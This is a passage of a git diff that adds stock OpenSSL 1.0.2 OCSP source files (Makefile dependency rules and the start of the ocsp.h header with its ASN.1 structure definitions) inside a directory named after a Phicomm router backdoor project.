+ocsp_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_prn.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_prn.o: ../../include/openssl/opensslconf.h
+ocsp_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_prn.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_prn.o: ocsp_prn.c
+ocsp_srv.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_srv.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_srv.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_srv.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_srv.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_srv.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_srv.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_srv.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_srv.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_srv.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_srv.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_srv.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_srv.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_srv.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_srv.c
+ocsp_vfy.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_vfy.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_vfy.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_vfy.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_vfy.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_vfy.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_vfy.o: ../../include/openssl/opensslconf.h
+ocsp_vfy.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_vfy.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_vfy.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_vfy.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_vfy.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_vfy.o: ocsp_vfy.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile.save
new file mode 100644
index 0000000..31a4a3e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile.save
@@ -0,0 +1,201 @@
+#
+# OpenSSL/ocsp/Makefile
+#
+
+DIR=	ocsp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= ocsp_asn.c ocsp_ext.c ocsp_ht.c ocsp_lib.c ocsp_cl.c \
+	ocsp_srv.c ocsp_prn.c ocsp_vfy.c ocsp_err.c
+
+LIBOBJ= ocsp_asn.o ocsp_ext.o ocsp_ht.o ocsp_lib.o ocsp_cl.o \
+	ocsp_srv.o ocsp_prn.o ocsp_vfy.o ocsp_err.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ocsp.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ocsp_asn.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ocsp_asn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_asn.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+ocsp_asn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_asn.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_asn.o: ../../include/openssl/opensslconf.h
+ocsp_asn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_asn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_asn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_asn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_asn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_asn.o: ocsp_asn.c
+ocsp_cl.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_cl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_cl.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_cl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_cl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_cl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_cl.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_cl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_cl.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_cl.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_cl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_cl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_cl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_cl.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_cl.c
+ocsp_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_err.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_err.o: ../../include/openssl/opensslconf.h
+ocsp_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_err.o: ocsp_err.c
+ocsp_ext.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_ext.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_ext.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_ext.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_ext.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_ext.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_ext.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_ext.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_ext.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_ext.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_ext.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_ext.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_ext.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_ext.c
+ocsp_ht.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_ht.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_ht.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_ht.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_ht.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_ht.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_ht.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_ht.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_ht.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_ht.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_ht.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_ht.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_ht.o: ocsp_ht.c
+ocsp_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_lib.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ocsp_lib.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_lib.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_lib.o: ../../include/openssl/opensslconf.h
+ocsp_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_lib.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_lib.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_lib.c
+ocsp_prn.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_prn.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_prn.o: ../../include/openssl/opensslconf.h
+ocsp_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_prn.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_prn.o: ocsp_prn.c
+ocsp_srv.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_srv.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_srv.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_srv.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_srv.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_srv.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_srv.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_srv.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_srv.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_srv.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_srv.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_srv.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_srv.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_srv.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_srv.c
+ocsp_vfy.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_vfy.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_vfy.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_vfy.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_vfy.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_vfy.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_vfy.o: ../../include/openssl/opensslconf.h
+ocsp_vfy.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_vfy.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_vfy.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_vfy.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_vfy.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_vfy.o: ocsp_vfy.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp.h
new file mode 100644
index 0000000..ca2ee76
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp.h
@@ -0,0 +1,637 @@
+/* ocsp.h */
+/*
+ * Written by Tom Titchener <Tom_Titchener@groove.net> for the OpenSSL
+ * project.
+ */
+
+/*
+ * History: This file was transfered to Richard Levitte from CertCo by Kathy
+ * Weinhold in mid-spring 2000 to be included in OpenSSL or released as a
+ * patch kit.
+ */
+
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_OCSP_H
+# define HEADER_OCSP_H
+
+# include <openssl/ossl_typ.h>
+# include <openssl/x509.h>
+# include <openssl/x509v3.h>
+# include <openssl/safestack.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Various flags and values */
+
+# define OCSP_DEFAULT_NONCE_LENGTH       16
+
+# define OCSP_NOCERTS                    0x1
+# define OCSP_NOINTERN                   0x2
+# define OCSP_NOSIGS                     0x4
+# define OCSP_NOCHAIN                    0x8
+# define OCSP_NOVERIFY                   0x10
+# define OCSP_NOEXPLICIT                 0x20
+# define OCSP_NOCASIGN                   0x40
+# define OCSP_NODELEGATED                0x80
+# define OCSP_NOCHECKS                   0x100
+# define OCSP_TRUSTOTHER                 0x200
+# define OCSP_RESPID_KEY                 0x400
+# define OCSP_NOTIME                     0x800
+
+/*-  CertID ::= SEQUENCE {
+ *       hashAlgorithm            AlgorithmIdentifier,
+ *       issuerNameHash     OCTET STRING, -- Hash of Issuer's DN
+ *       issuerKeyHash      OCTET STRING, -- Hash of Issuers public key (excluding the tag & length fields)
+ *       serialNumber       CertificateSerialNumber }
+ */
+typedef struct ocsp_cert_id_st {
+    X509_ALGOR *hashAlgorithm;
+    ASN1_OCTET_STRING *issuerNameHash;
+    ASN1_OCTET_STRING *issuerKeyHash;
+    ASN1_INTEGER *serialNumber;
+} OCSP_CERTID;
+
+DECLARE_STACK_OF(OCSP_CERTID)
+
+/*-  Request ::=     SEQUENCE {
+ *       reqCert                    CertID,
+ *       singleRequestExtensions    [0] EXPLICIT Extensions OPTIONAL }
+ */
+typedef struct ocsp_one_request_st {
+    OCSP_CERTID *reqCert;
+    STACK_OF(X509_EXTENSION) *singleRequestExtensions;
+} OCSP_ONEREQ;
+
+DECLARE_STACK_OF(OCSP_ONEREQ)
+DECLARE_ASN1_SET_OF(OCSP_ONEREQ)
+
+/*-  TBSRequest      ::=     SEQUENCE {
+ *       version             [0] EXPLICIT Version DEFAULT v1,
+ *       requestorName       [1] EXPLICIT GeneralName OPTIONAL,
+ *       requestList             SEQUENCE OF Request,
+ *       requestExtensions   [2] EXPLICIT Extensions OPTIONAL }
+ */
+typedef struct ocsp_req_info_st {
+    ASN1_INTEGER *version;
+    GENERAL_NAME *requestorName;
+    STACK_OF(OCSP_ONEREQ) *requestList;
+    STACK_OF(X509_EXTENSION) *requestExtensions;
+} OCSP_REQINFO;
+
+/*-  Signature       ::=     SEQUENCE {
+ *       signatureAlgorithm   AlgorithmIdentifier,
+ *       signature            BIT STRING,
+ *       certs                [0] EXPLICIT SEQUENCE OF Certificate OPTIONAL }
+ */
+typedef struct ocsp_signature_st {
+    X509_ALGOR *signatureAlgorithm;
+    ASN1_BIT_STRING *signature;
+    STACK_OF(X509) *certs;
+} OCSP_SIGNATURE;
+
+/*-  OCSPRequest     ::=     SEQUENCE {
+ *       tbsRequest                  TBSRequest,
+ *       optionalSignature   [0]     EXPLICIT Signature OPTIONAL }
+ */
+typedef struct ocsp_request_st {
+    OCSP_REQINFO *tbsRequest;
+    OCSP_SIGNATURE *optionalSignature; /* OPTIONAL */
+} OCSP_REQUEST;
+
+/*-  OCSPResponseStatus ::= ENUMERATED {
+ *       successful            (0),      --Response has valid confirmations
+ *       malformedRequest      (1),      --Illegal confirmation request
+ *       internalError         (2),      --Internal error in issuer
+ *       tryLater              (3),      --Try again later
+ *                                       --(4) is not used
+ *       sigRequired           (5),      --Must sign the request
+ *       unauthorized          (6)       --Request unauthorized
+ *   }
+ */
+# define OCSP_RESPONSE_STATUS_SUCCESSFUL          0
+# define OCSP_RESPONSE_STATUS_MALFORMEDREQUEST     1
+# define OCSP_RESPONSE_STATUS_INTERNALERROR        2
+# define OCSP_RESPONSE_STATUS_TRYLATER             3
+# define OCSP_RESPONSE_STATUS_SIGREQUIRED          5
+# define OCSP_RESPONSE_STATUS_UNAUTHORIZED         6
+
+/*-  ResponseBytes ::=       SEQUENCE {
+ *       responseType   OBJECT IDENTIFIER,
+ *       response       OCTET STRING }
+ */
+typedef struct ocsp_resp_bytes_st {
+    ASN1_OBJECT *responseType;
+    ASN1_OCTET_STRING *response;
+} OCSP_RESPBYTES;
+
+/*-  OCSPResponse ::= SEQUENCE {
+ *      responseStatus         OCSPResponseStatus,
+ *      responseBytes          [0] EXPLICIT ResponseBytes OPTIONAL }
+ */
+struct ocsp_response_st {
+    ASN1_ENUMERATED *responseStatus;
+    OCSP_RESPBYTES *responseBytes;
+};
+
+/*-  ResponderID ::= CHOICE {
+ *      byName   [1] Name,
+ *      byKey    [2] KeyHash }
+ */
+# define V_OCSP_RESPID_NAME 0
+# define V_OCSP_RESPID_KEY  1
+struct ocsp_responder_id_st {
+    int type;
+    union {
+        X509_NAME *byName;
+        ASN1_OCTET_STRING *byKey;
+    } value;
+};
+
+DECLARE_STACK_OF(OCSP_RESPID)
+DECLARE_ASN1_FUNCTIONS(OCSP_RESPID)
+
+/*-  KeyHash ::= OCTET STRING --SHA-1 hash of responder's public key
+ *                            --(excluding the tag and length fields)
+ */
+
+/*-  RevokedInfo ::= SEQUENCE {
+ *       revocationTime              GeneralizedTime,
+ *       revocationReason    [0]     EXPLICIT CRLReason OPTIONAL }
+ */
+typedef struct ocsp_revoked_info_st {
+    ASN1_GENERALIZEDTIME *revocationTime;
+    ASN1_ENUMERATED *revocationReason;
+} OCSP_REVOKEDINFO;
+
+/*-  CertStatus ::= CHOICE {
+ *       good                [0]     IMPLICIT NULL,
+ *       revoked             [1]     IMPLICIT RevokedInfo,
+ *       unknown             [2]     IMPLICIT UnknownInfo }
+ */
+# define V_OCSP_CERTSTATUS_GOOD    0
+# define V_OCSP_CERTSTATUS_REVOKED 1
+# define V_OCSP_CERTSTATUS_UNKNOWN 2
+typedef struct ocsp_cert_status_st {
+    int type;
+    union {
+        ASN1_NULL *good;
+        OCSP_REVOKEDINFO *revoked;
+        ASN1_NULL *unknown;
+    } value;
+} OCSP_CERTSTATUS;
+
+/*-  SingleResponse ::= SEQUENCE {
+ *      certID                       CertID,
+ *      certStatus                   CertStatus,
+ *      thisUpdate                   GeneralizedTime,
+ *      nextUpdate           [0]     EXPLICIT GeneralizedTime OPTIONAL,
+ *      singleExtensions     [1]     EXPLICIT Extensions OPTIONAL }
+ */
+typedef struct ocsp_single_response_st {
+    OCSP_CERTID *certId;
+    OCSP_CERTSTATUS *certStatus;
+    ASN1_GENERALIZEDTIME *thisUpdate;
+    ASN1_GENERALIZEDTIME *nextUpdate;
+    STACK_OF(X509_EXTENSION) *singleExtensions;
+} OCSP_SINGLERESP;
+
+DECLARE_STACK_OF(OCSP_SINGLERESP)
+DECLARE_ASN1_SET_OF(OCSP_SINGLERESP)
+
+/*-  ResponseData ::= SEQUENCE {
+ *      version              [0] EXPLICIT Version DEFAULT v1,
+ *      responderID              ResponderID,
+ *      producedAt               GeneralizedTime,
+ *      responses                SEQUENCE OF SingleResponse,
+ *      responseExtensions   [1] EXPLICIT Extensions OPTIONAL }
+ */
+typedef struct ocsp_response_data_st {
+    ASN1_INTEGER *version;
+    OCSP_RESPID *responderId;
+    ASN1_GENERALIZEDTIME *producedAt;
+    STACK_OF(OCSP_SINGLERESP) *responses;
+    STACK_OF(X509_EXTENSION) *responseExtensions;
+} OCSP_RESPDATA;
+
+/*-  BasicOCSPResponse       ::= SEQUENCE {
+ *      tbsResponseData      ResponseData,
+ *      signatureAlgorithm   AlgorithmIdentifier,
+ *      signature            BIT STRING,
+ *      certs                [0] EXPLICIT SEQUENCE OF Certificate OPTIONAL }
+ */
+  /*
+   * Note 1: The value for "signature" is specified in the OCSP rfc2560 as
+   * follows: "The value for the signature SHALL be computed on the hash of
+   * the DER encoding ResponseData." This means that you must hash the
+   * DER-encoded tbsResponseData, and then run it through a crypto-signing
+   * function, which will (at least w/RSA) do a hash-'n'-private-encrypt
+   * operation.  This seems a bit odd, but that's the spec.  Also note that
+   * the data structures do not leave anywhere to independently specify the
+   * algorithm used for the initial hash. So, we look at the
+   * signature-specification algorithm, and try to do something intelligent.
+   * -- Kathy Weinhold, CertCo
+   */
+  /*
+   * Note 2: It seems that the mentioned passage from RFC 2560 (section
+   * 4.2.1) is open for interpretation.  I've done tests against another
+   * responder, and found that it doesn't do the double hashing that the RFC
+   * seems to say one should.  Therefore, all relevant functions take a flag
+   * saying which variant should be used.  -- Richard Levitte, OpenSSL team
+   * and CeloCom
+   */
+typedef struct ocsp_basic_response_st {
+    OCSP_RESPDATA *tbsResponseData;
+    X509_ALGOR *signatureAlgorithm;
+    ASN1_BIT_STRING *signature;
+    STACK_OF(X509) *certs;
+} OCSP_BASICRESP;
+
+/*-
+ *   CRLReason ::= ENUMERATED {
+ *        unspecified             (0),
+ *        keyCompromise           (1),
+ *        cACompromise            (2),
+ *        affiliationChanged      (3),
+ *        superseded              (4),
+ *        cessationOfOperation    (5),
+ *        certificateHold         (6),
+ *        removeFromCRL           (8) }
+ */
+# define OCSP_REVOKED_STATUS_NOSTATUS               -1
+# define OCSP_REVOKED_STATUS_UNSPECIFIED             0
+# define OCSP_REVOKED_STATUS_KEYCOMPROMISE           1
+# define OCSP_REVOKED_STATUS_CACOMPROMISE            2
+# define OCSP_REVOKED_STATUS_AFFILIATIONCHANGED      3
+# define OCSP_REVOKED_STATUS_SUPERSEDED              4
+# define OCSP_REVOKED_STATUS_CESSATIONOFOPERATION    5
+# define OCSP_REVOKED_STATUS_CERTIFICATEHOLD         6
+# define OCSP_REVOKED_STATUS_REMOVEFROMCRL           8
+
+/*-
+ * CrlID ::= SEQUENCE {
+ *     crlUrl               [0]     EXPLICIT IA5String OPTIONAL,
+ *     crlNum               [1]     EXPLICIT INTEGER OPTIONAL,
+ *     crlTime              [2]     EXPLICIT GeneralizedTime OPTIONAL }
+ */
+typedef struct ocsp_crl_id_st {
+    ASN1_IA5STRING *crlUrl;
+    ASN1_INTEGER *crlNum;
+    ASN1_GENERALIZEDTIME *crlTime;
+} OCSP_CRLID;
+
+/*-
+ * ServiceLocator ::= SEQUENCE {
+ *      issuer    Name,
+ *      locator   AuthorityInfoAccessSyntax OPTIONAL }
+ */
+typedef struct ocsp_service_locator_st {
+    X509_NAME *issuer;
+    STACK_OF(ACCESS_DESCRIPTION) *locator;
+} OCSP_SERVICELOC;
+
+# define PEM_STRING_OCSP_REQUEST "OCSP REQUEST"
+# define PEM_STRING_OCSP_RESPONSE "OCSP RESPONSE"
+
+# define d2i_OCSP_REQUEST_bio(bp,p) ASN1_d2i_bio_of(OCSP_REQUEST,OCSP_REQUEST_new,d2i_OCSP_REQUEST,bp,p)
+
+# define d2i_OCSP_RESPONSE_bio(bp,p) ASN1_d2i_bio_of(OCSP_RESPONSE,OCSP_RESPONSE_new,d2i_OCSP_RESPONSE,bp,p)
+
+# define PEM_read_bio_OCSP_REQUEST(bp,x,cb) (OCSP_REQUEST *)PEM_ASN1_read_bio( \
